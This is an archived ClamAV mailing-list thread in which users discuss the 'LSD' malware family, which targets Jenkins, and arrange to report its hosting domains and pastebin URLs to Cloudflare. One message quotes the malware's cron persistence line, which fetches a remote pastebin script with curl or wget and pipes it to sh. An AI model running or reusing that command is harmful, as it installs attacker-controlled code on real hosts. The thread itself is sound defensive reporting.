[clamav-users] LSD Malwares
Joel Esler (jesler)
jesler at cisco.com
Fri Apr 26 16:47:51 UTC 2019
Dear ClamAV-users,
I reached out to my contacts at Cloudflare to take action.
--
Joel Esler
Manager, Communities Division
Cisco Talos Intelligence Group
http://www.talosintelligence.com
On Apr 25, 2019, at 11:25 PM, Xavier Maysonnave via clamav-users <clamav-users at lists.clamav.net<mailto:clamav-users at lists.clamav.net>> wrote:
Hi All,
Thanks for your feedback.
I'm going to report to Cloudflare this URL.
However keep in mind that there are other URLs who are involved in this family.
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget<https://pastebin.com/raw/wR3ETdbi%7C%7Cwget> -q -O- https://pastebin.com/raw/wR3ETdbi)|sh<https://pastebin.com/raw/wR3ETdbi)%7Csh>
This one targets Jenkins, another popular OpenSource tool, not used on our infrastructure though.
I'm still very interested with the consequences of this malwares. Any hints will be greatly appreciated.
Thanks.
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
Le ven. 26 avr. 2019 à 08:03, Dave Warren via clamav-users <clamav-users at lists.clamav.net<mailto:clamav-users at lists.clamav.net>> a écrit :
The same applies: Report it. Cloudflare will either forward the
complaint for you, or block the offending URL (or both).
On 2019-04-25 19:16, Dennis Peterson wrote:
> That domain is hosted on a cloudflare IP block. They're become part of
> the problem.
>
> dp
>
> On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>> Perhaps it would also be worthwhile to report dd.heheda.tk<http://dd.heheda.tk/> to their
>> hosting provider & domain registrar that they are hosting malware and
>> get that site shut down...
>>
_______________________________________________
clamav-users mailing list
clamav-users at lists.clamav.net<mailto:clamav-users at lists.clamav.net>
https://lists.clamav.net/mailman/listinfo/clamav-users
Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq
http://www.clamav.net/contact.html#ml
_______________________________________________
clamav-users mailing list
clamav-users at lists.clamav.net<mailto:clamav-users at lists.clamav.net>
https://lists.clamav.net/mailman/listinfo/clamav-users
Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq
http://www.clamav.net/contact.html#ml
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.clamav.net/pipermail/clamav-users/attachments/20190426/c4b12721/attachment.htm>
More information about the clamav-users
mailing list